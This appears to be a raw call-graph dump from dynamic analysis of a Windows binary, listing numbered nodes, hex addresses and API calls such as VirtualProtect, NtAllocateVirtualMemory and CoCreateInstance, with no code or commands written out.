33207 334f411 33205->33207 33209 334ec4a 33206->33209 33211 334efa6 33206->33211 33208 334f43d 33207->33208 33213 334f448 33208->33213 33210 334ec76 33209->33210 33212 334ec83 33210->33212 33217 33507dd 33211->33217 33218 334ecad 33212->33218 33214 3347be8 VirtualProtect 33213->33214 33215 334f461 33214->33215 33216 334f470 33215->33216 33219 334f47f 33216->33219 33220 3347be8 VirtualProtect 33217->33220 33221 3347be8 VirtualProtect 33218->33221 33224 334f4ab 33219->33224 33226 3350801 33220->33226 33222 334ecc6 33221->33222 33223 334ece7 33222->33223 33225 334ecf2 33223->33225 33227 334f4b8 33224->33227 33231 334ecff 33225->33231 33229 3350859 33226->33229 33228 334f4ef 33227->33228 33230 3347be8 VirtualProtect 33228->33230 33233 3347be8 VirtualProtect 33229->33233 33232 334f4fb 33230->33232 33234 3347be8 VirtualProtect 33231->33234 33237 334f527 33232->33237 33235 335087d 33233->33235 33236 334ed42 33234->33236 33238 33508b6 33235->33238 33240 334ed6e 33236->33240 33241 334f56b 33237->33241 33239 33508e0 33238->33239 33243 33508ed 33239->33243 33242 334edb2 33240->33242 33244 3347be8 VirtualProtect 33241->33244 33247 3347be8 VirtualProtect 33242->33247 33246 3347be8 VirtualProtect 33243->33246 33245 334f577 33244->33245 33245->33211 33251 334f589 33245->33251 33249 33508f9 33246->33249 33248 334edbe 33247->33248 33250 334edea 33248->33250 33254 3350925 33249->33254 33253 334edf7 33250->33253 33252 334f5b5 33251->33252 33258 334f5e1 33252->33258 33255 334ee21 33253->33255 33256 335095c 33254->33256 33257 334ee2e 33255->33257 33259 3347be8 VirtualProtect 33256->33259 33260 3347be8 VirtualProtect 33257->33260 33263 3347be8 VirtualProtect 33258->33263 33261 3350975 33259->33261 33262 334ee3a 33260->33262 33264 335099a 33261->33264 33335 3358b94 33261->33335 33265 334ee66 33262->33265 33266 334f605 33263->33266 33271 33509bb 33264->33271 33267 334ee73 33265->33267 33270 334f631 33266->33270 33268 334ee9d 33267->33268 33269 334eeaa 33268->33269 33272 3347be8 VirtualProtect 33269->33272 33275 3347be8 VirtualProtect 33270->33275 33274 3347be8 VirtualProtect 33271->33274 33273 334eeb6 33272->33273 33277 334eecd 33273->33277 33276 3350a16 33274->33276 33278 334f681 33275->33278 33282 3350a37 33276->33282 33280 334eede 33277->33280 33279 334f69d 33278->33279 33281 334f6ce 33279->33281 33286 334ef4b 33280->33286 33283 334f6d9 33281->33283 33284 3350a6e 33282->33284 33288 334f705 33283->33288 33285 3347be8 VirtualProtect 33284->33285 33289 3350a92 33285->33289 33287 334ef8d 33286->33287 33291 334ef9a 33287->33291 33290 334f71d 33288->33290 33296 3350acb 33289->33296 33292 3347be8 VirtualProtect 33290->33292 33293 3347be8 VirtualProtect 33291->33293 33294 334f729 33292->33294 33293->33211 33295 334f74a 33294->33295 33297 334f755 33295->33297 33298 3350b02 33296->33298 33300 334f781 33297->33300 33299 3347be8 VirtualProtect 33298->33299 33301 3350b0e 33299->33301 33302 334f799 33300->33302 33307 3350b3a 33301->33307 33303 3347be8 VirtualProtect 33302->33303 33304 334f7a5 33303->33304 33305 334f7c6 33304->33305 33306 334f7d1 33305->33306 33308 334f7fd 33306->33308 33309 3347be8 VirtualProtect 33307->33309 33311 334f808 33308->33311 33310 3350b8a 33309->33310 33317 3350ba6 33310->33317 33312 3347be8 VirtualProtect 33311->33312 33313 334f821 33312->33313 33314 334f842 33313->33314 33315 334f85a 33314->33315 33316 334f884 33315->33316 33318 334f891 33316->33318 33319 3350c26 33317->33319 33321 3347be8 VirtualProtect 33318->33321 33320 3347be8 VirtualProtect 33319->33320 33326 3350c32 33320->33326 33322 334f89d 33321->33322 33323 334f8be 33322->33323 33324 334f8d6 33323->33324 33325 334f900 33324->33325 33327 334f90d 33325->33327 33328 3350ca2 33326->33328 33329 3347be8 VirtualProtect 33327->33329 33330 3347be8 VirtualProtect 33328->33330 33331 334f919 33329->33331 33334 3350cae 33330->33334 33332 334f92e 33331->33332 33333 334f965 33332->33333 33337 334f99c 33333->33337 33339 3350d26 33334->33339 34041 333e3b0 VariantClear 33335->34041 33338 334f9b4 33337->33338 33341 3347be8 VirtualProtect 33338->33341 33340 3347be8 VirtualProtect 33339->33340 33345 3350d4a 33340->33345 33342 334f9c0 33341->33342 33343 334f9e1 33342->33343 33344 334f9ec 33343->33344 33347 334fa18 33344->33347 33346 3350da2 33345->33346 33348 3350dad 33346->33348 33349 334fa30 33347->33349 33350 3350dba 33348->33350 33351 3347be8 VirtualProtect 33349->33351 33352 3347be8 VirtualProtect 33350->33352 33353 334fa3c 33351->33353 33354 3350dc6 33352->33354 33356 334fa5d 33353->33356 33355 3350de7 33354->33355 33357 3350df2 33355->33357 33360 334fa68 33356->33360 33358 3350dff 33357->33358 33359 3350e1e 33358->33359 33361 3350e29 33359->33361 33362 334faac 33360->33362 33363 3350e36 33361->33363 33364 3347be8 VirtualProtect 33362->33364 33365 3347be8 VirtualProtect 33363->33365 33366 334fab8 33364->33366 33367 3350e42 33365->33367 33371 334fae3 33366->33371 33368 3350e53 33367->33368 33369 3350e69 33368->33369 33370 3350e7c 33369->33370 33372 3350e9d 33370->33372 33374 334fb1a 33371->33374 33378 3350ea8 33372->33378 33373 3358e6b 33373->32950 33375 334fb25 33374->33375 33376 3347be8 VirtualProtect 33375->33376 33377 334fb3e 33376->33377 33379 334fb6a 33377->33379 33380 3347be8 VirtualProtect 33378->33380 33381 334fb77 33379->33381 33382 3350ef8 33380->33382 33383 334fb96 33381->33383 33386 3350f24 33382->33386 33384 3347be8 VirtualProtect 33383->33384 33385 334fbba 33384->33385 33387 334fbf4 33385->33387 33388 3347be8 VirtualProtect 33386->33388 33389 334fbff 33387->33389 33390 3350f74 33388->33390 33391 334fc0c 33389->33391 33395 3350f92 33390->33395 33392 334fc43 33391->33392 33393 3347be8 VirtualProtect 33392->33393 33394 334fc70 33392->33394 33393->33392 33396 334fc7b 33394->33396 33397 3350ffb 33395->33397 33398 334fcbf 33396->33398 33401 335103a 33397->33401 33399 3347be8 VirtualProtect 33398->33399 33991 334c8ac 33398->33991 33399->33398 33405 3351071 33401->33405 33402 334fcdd 33403 334fcfe 33402->33403 33404 334fd09 33403->33404 33407 334fd16 33404->33407 33406 3347be8 VirtualProtect 33405->33406 33408 3351095 33406->33408 33409 334fd4d 33407->33409 33412 33510ce 33408->33412 33410 3347be8 VirtualProtect 33409->33410 33411 334fd7a 33409->33411 33410->33409 33603 334fd85 33411->33603 33413 3351105 33412->33413 33414 3347be8 VirtualProtect 33413->33414 33415 3351111 33414->33415 33417 3351128 33415->33417 33416 334fdc9 33418 3347be8 VirtualProtect 33416->33418 33606 334fcd5 33416->33606 33419 335113b 33417->33419 33458 3351319 33417->33458 33418->33416 33422 3351174 33419->33422 33420 334fdec 33421 334fe25 33420->33421 33429 334fe4f 33421->33429 33424 3347be8 VirtualProtect 33422->33424 33423 3351350 33425 3347be8 VirtualProtect 33423->33425 33428 33511b7 33424->33428 33426 33513a0 33425->33426 33432 33513cc 33426->33432 33427 3347be8 VirtualProtect 33427->33429 33430 33511f0 33428->33430 33429->33427 33435 334fea1 33429->33435 33431 3351227 33430->33431 33433 3347be8 VirtualProtect 33431->33433 33434 3347be8 VirtualProtect 33432->33434 33436 3351233 33433->33436 33437 335141c 33434->33437 33438 3347be8 VirtualProtect 33435->33438 33439 334feeb 33435->33439 33440 3351262 33436->33440 33446 335144f 33437->33446 33438->33435 33441 334ff17 33439->33441 33442 3347be8 VirtualProtect 33440->33442 33443 334ff43 33441->33443 33444 3351286 33442->33444 33445 334ff4e 33443->33445 33449 33512bf 33444->33449 33448 3347be8 VirtualProtect 33445->33448 33447 3347be8 VirtualProtect 33446->33447 33450 33514cb 33447->33450 33451 334ff67 33448->33451 33452 33512f6 33449->33452 33457 3351504 33450->33457 33453 334ff93 33451->33453 33454 3347be8 VirtualProtect 33452->33454 33456 334ffbf 33453->33456 33455 3351302 33454->33455 33455->33458 33459 334ffca 33456->33459 33460 335153b 33457->33460 33458->33423 33462 3347be8 VirtualProtect 33459->33462 33461 3347be8 VirtualProtect 33460->33461 33465 3351547 33461->33465 33463 334ffe3 33462->33463 33999 3346d84 33463->33999 34038 3342854 VariantClear 33463->34038 33468 3351573 33465->33468 33467 3350003 33469 335002f 33467->33469 33470 33515aa 33468->33470 33471 335003c 33469->33471 33472 3347be8 VirtualProtect 33470->33472 33474 3350066 33471->33474 33473 33515c3 33472->33473 33476 33515e4 33473->33476 33477 3350073 33474->33477 33475 3347be8 VirtualProtect 33475->33477 33480 335161b 33476->33480 33477->33475 33478 33500a0 33477->33478 33479 33500ab 33478->33479 33482 33500d7 33479->33482 33481 3347be8 VirtualProtect 33480->33481 33489 335163f 33481->33489 33483 33500ef 33482->33483 33485 3347be8 VirtualProtect 33483->33485 33484 3353345 33491 3353371 33484->33491 33488 33500fb 33485->33488 33486 3351654 33486->33489 33490 335013c 33488->33490 34004 333e3b8 33488->34004 33489->33484 33489->33486 33492 33516bd 33489->33492 33493 3350154 33490->33493 33494 33533a8 33491->33494 33498 33516de 33492->33498 33495 335017e 33493->33495 33496 3347be8 VirtualProtect 33494->33496 33500 335018b 33495->33500 33497 33533c1 33496->33497 33501 33533e2 33497->33501 33502 3351715 33498->33502 33499 3347be8 VirtualProtect 33499->33500 33500->33499 33503 33501b8 33500->33503 33505 3353419 33501->33505 33504 3347be8 VirtualProtect 33502->33504 33507 33501d0 33503->33507 33506 3351739 33504->33506 33508 3347be8 VirtualProtect 33505->33508 33511 3351772 33506->33511 33512 3350207 33507->33512 33509 335343d 33508->33509 33516 3353476 33509->33516 33510 3347be8 VirtualProtect 33510->33512 33514 33517a9 33511->33514 33512->33510 33513 333e3b8 2 API calls 33512->33513 33517 3350224 33513->33517 33515 3347be8 VirtualProtect 33514->33515 33520 33517b5 33515->33520 33519 33534ad 33516->33519 33518 3350253 33517->33518 33521 3350260 33518->33521 33522 3347be8 VirtualProtect 33519->33522 33524 33517e1 33520->33524 33525 335028a 33521->33525 33523 33534b9 33522->33523 33528 33534e5 33523->33528 33526 3351818 33524->33526 33527 3347be8 VirtualProtect 33525->33527 33531 3347be8 VirtualProtect 33526->33531 33529 33502a3 33527->33529 33535 335351c 33528->33535 33530 33502c4 33529->33530 33533 33502cf 33530->33533 33532 3351831 33531->33532 33534 3351841 33532->33534 33538 33502dc 33533->33538 33534->33484 33545 3351854 33534->33545 33536 3347be8 VirtualProtect 33535->33536 33537 3353535 33536->33537 33539 3353556 33537->33539 33540 3347be8 VirtualProtect 33538->33540 33544 335358d 33539->33544 33541 335031f 33540->33541 33542 333e3b8 2 API calls 33541->33542 34015 33417a4 33541->34015 33542->33541 33547 3347be8 VirtualProtect 33544->33547 33546 3347be8 VirtualProtect 33545->33546 33555 33518d0 33546->33555 33554 33535b1 33547->33554 33548 3350348 33549 33503a0 33548->33549 33550 33503ab 33549->33550 33551 3347be8 VirtualProtect 33550->33551 33552 33503c4 33551->33552 33553 33503e5 33552->33553 33557 33503fd 33553->33557 33558 335363a 33554->33558 33556 3347be8 VirtualProtect 33555->33556 33568 335194c 33556->33568 33560 335041c 33557->33560 33559 3347be8 VirtualProtect 33558->33559 33562 3353653 33559->33562 33561 3347be8 VirtualProtect 33560->33561 33563 3350440 33561->33563 33566 33536b6 33562->33566 33564 3350445 33563->33564 33565 3350471 33564->33565 33569 335047e 33565->33569 33567 3347be8 VirtualProtect 33566->33567 33572 33536cf 33567->33572 33570 3347be8 VirtualProtect 33568->33570 33571 33504b5 33569->33571 33575 3351a33 33570->33575 33573 3347be8 VirtualProtect 33571->33573 33577 3353727 33572->33577 33574 33504c1 33573->33574 33576 33504ed 33574->33576 33575->32950 33578 3350531 33576->33578 33579 3347be8 VirtualProtect 33577->33579 33580 3347be8 VirtualProtect 33578->33580 33583 3353777 33579->33583 33580->33606 33581 3350562 33582 33505ba 33581->33582 33585 33505c5 33582->33585 33584 3347be8 VirtualProtect 33583->33584 33590 33537f3 33584->33590 33586 3347be8 VirtualProtect 33585->33586 33587 33505de 33586->33587 33588 33505ff 33587->33588 33589 3350617 33588->33589 33592 3350636 33589->33592 33591 3347be8 VirtualProtect 33590->33591 33597 335386f 33591->33597 33593 3347be8 VirtualProtect 33592->33593 33594 335065a 33593->33594 33595 335066a 33594->33595 33596 335069b 33595->33596 33599 33506a6 33596->33599 33598 3347be8 VirtualProtect 33597->33598 33604 33538eb 33598->33604 33600 33506dd 33599->33600 33601 33506ea 33600->33601 33602 3347be8 VirtualProtect 33601->33602 33601->33603 33602->33601 33603->33416 33605 3347be8 VirtualProtect 33604->33605 33608 3353998 33605->33608 33606->33211 33606->33366 33606->33402 33606->33420 33606->33581 33607 3347be8 VirtualProtect 33606->33607 33607->33606 33609 3347be8 VirtualProtect 33608->33609 33610 3353a14 33609->33610 33611 3347be8 VirtualProtect 33610->33611 33612 3353a90 33611->33612 33613 3353abc 33612->33613 33614 3347be8 VirtualProtect 33613->33614 33615 3353b0c 33614->33615 33616 3347be8 VirtualProtect 33615->33616 33617 3353b88 33616->33617 33618 3347be8 VirtualProtect 33617->33618 33619 3353c04 33618->33619 33620 33553e0 33619->33620 33622 3353c64 33619->33622 33621 3347be8 VirtualProtect 33620->33621 33624 335545c 33621->33624 33623 3347be8 VirtualProtect 33622->33623 33626 3353ce0 33623->33626 33625 3347be8 VirtualProtect 33624->33625 33628 33554d8 33625->33628 33627 3347be8 VirtualProtect 33626->33627 33630 3353d5c 33627->33630 33629 3347be8 VirtualProtect 33628->33629 33632 3355554 33629->33632 33631 3347be8 VirtualProtect 33630->33631 33636 3353dd8 33631->33636 33633 3347be8 VirtualProtect 33632->33633 33634 33555d0 33633->33634 33635 3347be8 VirtualProtect 33634->33635 33637 335564c 33635->33637 33638 3347be8 VirtualProtect 33636->33638 33641 3356190 33637->33641 33642 3355661 33637->33642 33639 3353e8c 33638->33639 33640 3347be8 VirtualProtect 33639->33640 33645 3353f08 33640->33645 33643 3347be8 VirtualProtect 33641->33643 33644 3347be8 VirtualProtect 33642->33644 33647 335620c 33643->33647 33648 33556dd 33644->33648 33646 3347be8 VirtualProtect 33645->33646 33651 3353f84 33646->33651 33649 3347be8 VirtualProtect 33647->33649 33650 3347be8 VirtualProtect 33648->33650 33653 3356288 33649->33653 33654 3355759 33650->33654 33652 3347be8 VirtualProtect 33651->33652 33660 3354000 33652->33660 33656 3347be8 VirtualProtect 33653->33656 33655 3347be8 VirtualProtect 33654->33655 33662 33557d5 33655->33662 33657 3356304 33656->33657 33658 3347be8 VirtualProtect 33657->33658 33659 3356380 33658->33659 33664 3356395 33659->33664 33665 3356b47 33659->33665 33661 3347be8 VirtualProtect 33660->33661 33667 33540cd 33661->33667 33663 3347be8 VirtualProtect 33662->33663 33670 335587a 33663->33670 33668 3347be8 VirtualProtect 33664->33668 33666 3347be8 VirtualProtect 33665->33666 33673 3356bd0 33666->33673 33669 3347be8 VirtualProtect 33667->33669 33672 3356411 33668->33672 33674 3354149 33669->33674 33671 3347be8 VirtualProtect 33670->33671 33678 33558f6 33671->33678 33675 3347be8 VirtualProtect 33672->33675 33676 3347be8 VirtualProtect 33673->33676 33677 3347be8 VirtualProtect 33674->33677 33680 335648d 33675->33680 33681 3356c4c 33676->33681 33682 33541c5 33677->33682 33679 3347be8 VirtualProtect 33678->33679 33687 3355972 33679->33687 33683 3347be8 VirtualProtect 33680->33683 33684 3347be8 VirtualProtect 33681->33684 33685 3347be8 VirtualProtect 33682->33685 33686 3356509 33683->33686 33695 3356cc8 33684->33695 33691 3354241 33685->33691 33689 335656c 33686->33689 33688 3347be8 VirtualProtect 33687->33688 33697 3355a15 33688->33697 33690 3347be8 VirtualProtect 33689->33690 33699 3356585 33690->33699 33692 3347be8 VirtualProtect 33691->33692 33701 33542bd 33692->33701 33693 33574a8 33694 3347be8 VirtualProtect 33693->33694 33703 3357524 33694->33703 33695->33693 33696 3347be8 VirtualProtect 33695->33696 33705 3356d6e 33696->33705 33698 3347be8 VirtualProtect 33697->33698 33707 3355a91 33698->33707 33700 3347be8 VirtualProtect 33699->33700 33709 3356601 33700->33709 33702 3347be8 VirtualProtect 33701->33702 33714 3354339 33702->33714 33704 3347be8 VirtualProtect 33703->33704 33711 33575a0 33704->33711 33706 3347be8 VirtualProtect 33705->33706 33713 3356dea 33706->33713 33708 3347be8 VirtualProtect 33707->33708 33718 3355b0d 33708->33718 33710 3347be8 VirtualProtect 33709->33710 33723 335667d 33710->33723 33712 3347be8 VirtualProtect 33711->33712 33717 335761c 33712->33717 33715 3347be8 VirtualProtect 33713->33715 33716 3347be8 VirtualProtect 33714->33716 33732 3356e66 33715->33732 33726 33543ee 33716->33726 33719 3347be8 VirtualProtect 33717->33719 33720 3347be8 VirtualProtect 33718->33720 33721 335764f 33719->33721 33729 3355ba8 33720->33729 33722 3347be8 VirtualProtect 33721->33722 33725 3357682 33722->33725 33724 3347be8 VirtualProtect 33723->33724 33735 3356716 33724->33735 33727 3347be8 VirtualProtect 33725->33727 33728 3347be8 VirtualProtect 33726->33728 33730 33576b5 33727->33730 33737 335446a 33728->33737 33731 3347be8 VirtualProtect 33729->33731 33733 3347be8 VirtualProtect 33730->33733 33739 3355c24 33731->33739 33734 3347be8 VirtualProtect 33732->33734 33741 33576e8 33733->33741 33743 3356f3d 33734->33743 33736 3347be8 VirtualProtect 33735->33736 33745 3356792 33736->33745 33738 3347be8 VirtualProtect 33737->33738 33748 33544e6 33738->33748 33740 3347be8 VirtualProtect 33739->33740 33754 3355ca0 33740->33754 33742 3347be8 VirtualProtect 33741->33742 33751 3357764 33742->33751 33744 3347be8 VirtualProtect 33743->33744 33753 3356fb9 33744->33753 33746 3347be8 VirtualProtect 33745->33746 33747 335680e 33746->33747 34035 3347968 33747->34035 33749 3347be8 VirtualProtect 33748->33749 33760 3354562 33749->33760 33752 3347be8 VirtualProtect 33751->33752 33764 33577e0 33752->33764 33755 3347be8 VirtualProtect 33753->33755 33818 335725c 33753->33818 33757 3347be8 VirtualProtect 33754->33757 33767 3357047 33755->33767 33756 3347be8 VirtualProtect 33766 335731e 33756->33766 33773 3355d5d 33757->33773 33758 3356828 33759 3347be8 VirtualProtect 33758->33759 33772 33568a9 33759->33772 33761 3354767 33760->33761 33763 3347be8 VirtualProtect 33760->33763 33762 3347be8 VirtualProtect 33761->33762 33777 3354851 33762->33777 33776 33545f3 33763->33776 33765 3347be8 VirtualProtect 33764->33765 33769 335785c 33765->33769 33768 3347be8 VirtualProtect 33766->33768 33770 3347be8 VirtualProtect 33767->33770 33784 335739a 33768->33784 33771 3347be8 VirtualProtect 33769->33771 33783 33570c3 33770->33783 33775 335788f 33771->33775 33774 3347be8 VirtualProtect 33772->33774 33778 3347be8 VirtualProtect 33773->33778 33789 3356925 33774->33789 33781 3347be8 VirtualProtect 33775->33781 33779 3347be8 VirtualProtect 33776->33779 33780 3347be8 VirtualProtect 33777->33780 33791 3355dfc 33778->33791 33793 335466f 33779->33793 33794 33548cd 33780->33794 33782 33578c2 33781->33782 33787 3347be8 VirtualProtect 33782->33787 33785 3347be8 VirtualProtect 33783->33785 33786 3347be8 VirtualProtect 33784->33786 33803 335713f 33785->33803 33800 3357416 33786->33800 33788 33578f5 33787->33788 33792 3347be8 VirtualProtect 33788->33792 33790 3347be8 VirtualProtect 33789->33790 33809 33569a1 33790->33809 33795 3347be8 VirtualProtect 33791->33795 33798 3357928 33792->33798 33796 3347be8 VirtualProtect 33793->33796 33797 3347be8 VirtualProtect 33794->33797 33806 3355e78 33795->33806 33807 33546eb 33796->33807 33808 3354949 33797->33808 33799 3347be8 VirtualProtect 33798->33799 33814 335795b 33799->33814 33801 3347be8 VirtualProtect 33800->33801 33802 3357492 33801->33802 34040 3347f48 NtAllocateVirtualMemory VirtualProtect 33802->34040 33805 3347be8 VirtualProtect 33803->33805 33816 33571e0 33805->33816 33810 3347be8 VirtualProtect 33806->33810 33811 3347be8 VirtualProtect 33807->33811 33812 3347be8 VirtualProtect 33808->33812 33813 3347be8 VirtualProtect 33809->33813 33820 3355ef4 33810->33820 33811->33761 33819 33549c5 33812->33819 33824 3356a4f 33813->33824 33815 3347be8 VirtualProtect 33814->33815 33828 33579d7 33815->33828 33817 3347be8 VirtualProtect 33816->33817 33817->33818 33818->33756 33822 3347be8 VirtualProtect 33819->33822 33821 3347be8 VirtualProtect 33820->33821 33823 3355f70 33821->33823 33832 3354a41 33822->33832 34039 334a1c0 NtAllocateVirtualMemory VirtualProtect 33823->34039 33826 3347be8 VirtualProtect 33824->33826 33834 3356acb 33826->33834 33827 3355f81 33827->32950 33829 3347be8 VirtualProtect 33828->33829 33830 3357a53 33829->33830 33831 3347be8 VirtualProtect 33830->33831 33836 3357a86 33831->33836 33833 3347be8 VirtualProtect 33832->33833 33838 3354abd 33833->33838 33835 3347be8 VirtualProtect 33834->33835 33835->33665 33837 3347be8 VirtualProtect 33836->33837 33840 3357b02 33837->33840 33839 3347be8 VirtualProtect 33838->33839 33842 3354b39 33839->33842 33841 3347be8 VirtualProtect 33840->33841 33844 3357b7e 33841->33844 33843 3347be8 VirtualProtect 33842->33843 33851 3354bd4 33843->33851 33845 3347be8 VirtualProtect 33844->33845 33846 3357bfa 33845->33846 33847 3347be8 VirtualProtect 33846->33847 33848 3357c2d 33847->33848 33849 3347be8 VirtualProtect 33848->33849 33850 3357c60 33849->33850 33852 3347be8 VirtualProtect 33850->33852 33853 3347be8 VirtualProtect 33851->33853 33854 3357c93 33852->33854 33856 3354ccd 33853->33856 33855 3347be8 VirtualProtect 33854->33855 33858 3357cc6 33855->33858 33857 3347be8 VirtualProtect 33856->33857 33862 3354d49 33857->33862 33859 3347be8 VirtualProtect 33858->33859 33860 3357d42 33859->33860 33861 3347be8 VirtualProtect 33860->33861 33864 3357dbe 33861->33864 33863 3347be8 VirtualProtect 33862->33863 33868 3354e01 33863->33868 33865 3347be8 VirtualProtect 33864->33865 33866 3357df1 33865->33866 33867 3347be8 VirtualProtect 33866->33867 33869 3357e24 33867->33869 33870 3347be8 VirtualProtect 33868->33870 33871 3347be8 VirtualProtect 33869->33871 33875 3354e7d 33870->33875 33872 3357e57 33871->33872 33873 3347be8 VirtualProtect 33872->33873 33874 3357e8a 33873->33874 33876 3347be8 VirtualProtect 33874->33876 33875->32950 33877 3357ebd 33876->33877 33878 3347be8 VirtualProtect 33877->33878 33879 3357f39 33878->33879 33880 3347be8 VirtualProtect 33879->33880 33881 3357fb5 33880->33881 33882 3347be8 VirtualProtect 33881->33882 33883 3358031 33882->33883 33884 3347be8 VirtualProtect 33883->33884 33885 33580ad 33884->33885 33886 3347be8 VirtualProtect 33885->33886 33887 3358129 33886->33887 33888 3347be8 VirtualProtect 33887->33888 33889 3358138 33888->33889 33890 3347be8 VirtualProtect 33889->33890 33891 3358147 33890->33891 33892 3347be8 VirtualProtect 33891->33892 33893 3358156 33892->33893 33894 3347be8 VirtualProtect 33893->33894 33895 3358165 33894->33895 33896 3347be8 VirtualProtect 33895->33896 33897 3358174 33896->33897 33898 3347be8 VirtualProtect 33897->33898 33899 3358183 33898->33899 33900 3347be8 VirtualProtect 33899->33900 33901 3358192 33900->33901 33902 3347be8 VirtualProtect 33901->33902 33903 33581a1 33902->33903 33904 3347be8 VirtualProtect 33903->33904 33905 33581b0 33904->33905 33906 3347be8 VirtualProtect 33905->33906 33907 33581bf 33906->33907 33908 3347be8 VirtualProtect 33907->33908 33909 33581ce 33908->33909 33910 3347be8 VirtualProtect 33909->33910 33911 33581dd 33910->33911 33912 3347be8 VirtualProtect 33911->33912 33913 33581ec 33912->33913 33914 3347be8 VirtualProtect 33913->33914 33915 33581fb 33914->33915 33916 3347be8 VirtualProtect 33915->33916 33917 335820a 33916->33917 33918 3347be8 VirtualProtect 33917->33918 33919 3358286 33918->33919 33920 3347be8 VirtualProtect 33919->33920 33921 3358302 33920->33921 33922 3347be8 VirtualProtect 33921->33922 33923 335837e 33922->33923 33924 3347be8 VirtualProtect 33923->33924 33925 33583b1 33924->33925 33926 3347be8 VirtualProtect 33925->33926 33927 33583e4 33926->33927 33928 3347be8 VirtualProtect 33927->33928 33929 3358417 33928->33929 33930 3347be8 VirtualProtect 33929->33930 33931 335844a 33930->33931 33932 3347be8 VirtualProtect 33931->33932 33933 335847d 33932->33933 33934 3347be8 VirtualProtect 33933->33934 33935 33584b0 33934->33935 33936 3347be8 VirtualProtect 33935->33936 33937 33584e3 33936->33937 33938 3347be8 VirtualProtect 33937->33938 33939 335855f 33938->33939 33940 3347be8 VirtualProtect 33939->33940 33941 33585db 33940->33941 33942 3347be8 VirtualProtect 33941->33942 33943 3358657 33942->33943 33944 3347be8 VirtualProtect 33943->33944 33945 335868a 33944->33945 33946 3347be8 VirtualProtect 33945->33946 33947 33586bd 33946->33947 33948 3347be8 VirtualProtect 33947->33948 33949 33586f0 33948->33949 33950 3347be8 VirtualProtect 33949->33950 33951 3358723 33950->33951 33952 3347be8 VirtualProtect 33951->33952 33953 3358756 33952->33953 33954 3347be8 VirtualProtect 33953->33954 33955 3358789 33954->33955 33956 3347be8 VirtualProtect 33955->33956 33957 33587bc 33956->33957 33958 3347be8 VirtualProtect 33957->33958 33959 33587ef 33958->33959 33960 3347be8 VirtualProtect 33959->33960 33961 3358822 33960->33961 33962 3347be8 VirtualProtect 33961->33962 33963 3358855 33962->33963 33964 3347be8 VirtualProtect 33963->33964 33965 3358888 33964->33965 33966 3347be8 VirtualProtect 33965->33966 33967 33588bb 33966->33967 33968 3347be8 VirtualProtect 33967->33968 33969 33588ee 33968->33969 33970 3347be8 VirtualProtect 33969->33970 33971 3358921 33970->33971 33972 3347be8 VirtualProtect 33971->33972 33973 3358954 33972->33973 33974 3347be8 VirtualProtect 33973->33974 33975 3358987 33974->33975 33976 3347be8 VirtualProtect 33975->33976 33977 33589ba 33976->33977 33978 3347be8 VirtualProtect 33977->33978 33979 33589ed 33978->33979 33980 3347be8 VirtualProtect 33979->33980 33981 3358a20 33980->33981 33982 3347be8 VirtualProtect 33981->33982 33983 3358a9c 33982->33983 33984 3347be8 VirtualProtect 33983->33984 33985 3358b18 33984->33985 33986 3347be8 VirtualProtect 33985->33986 33986->33335 33988 3347bfd 33987->33988 34042 3347b20 33988->34042 33990 3347c57 33990->32957 33992 334c8b4 33991->33992 33993 3347be8 VirtualProtect 33992->33993 33994 334c92c 33993->33994 33995 3347be8 VirtualProtect 33994->33995 33996 334c985 33995->33996 33997 3347be8 VirtualProtect 33996->33997 33998 334c9de 33997->33998 33998->33606 34046 3346d28 33999->34046 34001 3346dbe 34002 3346dd8 CoCreateInstance 34001->34002 34003 3346e41 34002->34003 34003->33463 34005 333e3ca 34004->34005 34008 333e3e7 34004->34008 34006 333e3b8 2 API calls 34005->34006 34007 333e3df 34006->34007 34007->33488 34009 333e42a 34008->34009 34050 3347501 34008->34050 34010 333e4ab 34009->34010 34056 333e7c8 34009->34056 34010->33488 34016 33417ac 34015->34016 34016->34016 34017 3341a0d 34016->34017 34018 33419f4 34016->34018 34019 33419e3 34016->34019 34034 3341832 34016->34034 34022 3341a2c 34017->34022 34023 3341a1b 34017->34023 34017->34034 34084 33415ec VariantClear 34018->34084 34020 33417a4 2 API calls 34019->34020 34020->34034 34085 33416b8 VariantClear VariantCopy 34022->34085 34025 3341a4e 34023->34025 34026 3341c59 34023->34026 34027 3341c43 34025->34027 34029 3341c35 34025->34029 34025->34034 34087 334171c VariantClear 34026->34087 34086 33415ec VariantClear 34027->34086 34031 33417a4 2 API calls 34029->34031 34031->34034 34032 3341c69 34032->34034 34088 33415ec VariantClear 34032->34088 34034->33548 34036 334797a 34035->34036 34037 3347980 NtAllocateVirtualMemory 34036->34037 34037->33758 34038->33467 34039->33827 34040->33693 34041->33373 34043 3347b43 34042->34043 34044 3347b6c VirtualProtect 34043->34044 34045 3347b97 34044->34045 34045->33990 34047 3346d4c 34046->34047 34048 3346d5a CLSIDFromProgID 34047->34048 34049 3346d74 34048->34049 34049->34001 34051 334751a 34050->34051 34052 334757f 34051->34052 34068 333e39c VariantClear 34051->34068 34064 3347098 34052->34064 34055 3347594 34055->34009 34057 333e7d2 34056->34057 34058 333e4a3 34056->34058 34059 333e7d9 34057->34059 34060 333e7ff 34057->34060 34063 333e39c VariantClear 34058->34063 34059->34058 34079 333e320 34059->34079 34070 333e71c 34060->34070 34063->34010 34065 33470ba 34064->34065 34067 33472c4 34065->34067 34069 333ea94 VariantClear VariantCopy 34065->34069 34067->34055 34068->34052 34069->34065 34071 333e732 34070->34071 34072 333e72b 34070->34072 34074 333e73b 34071->34074 34077 333e749 34071->34077 34073 333e320 VariantClear 34072->34073 34073->34071 34076 333e742 VariantCopy 34074->34076 34075 333e750 34075->34058 34076->34075 34077->34075 34083 333e548 VariantClear 34077->34083 34080 333e32e 34079->34080 34082 333e33b 34079->34082 34081 333e334 VariantClear 34080->34081 34081->34082 34082->34058 34083->34075 34084->34034 34085->34034 34086->34034 34087->34032 34088->34034 34089 2de9220c 34090 2de9221a dllmain_dispatch 34089->34090 34091 2de92215 34089->34091 34093 2de922b1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 34091->34093 34093->34090 34094 2de95bff 34102 2de95d5c 34094->34102 34098 2de95c28 34099 2de95c1b 34099->34098 34110 2de95c2b 11 API calls 34099->34110 34101 2de95c13 34111 2de95c45 34102->34111 34105 2de95d9b TlsAlloc 34108 2de95d8c 34105->34108 34107 2de95c09 34107->34101 34109 2de95b7a 20 API calls _free 34107->34109 34118 2de92ada 34108->34118 34109->34099 34110->34101 34112 2de95c75 34111->34112 34115 2de95c71 34111->34115 34112->34105 34112->34108 34113 2de95c95 34113->34112 34116 2de95ca1 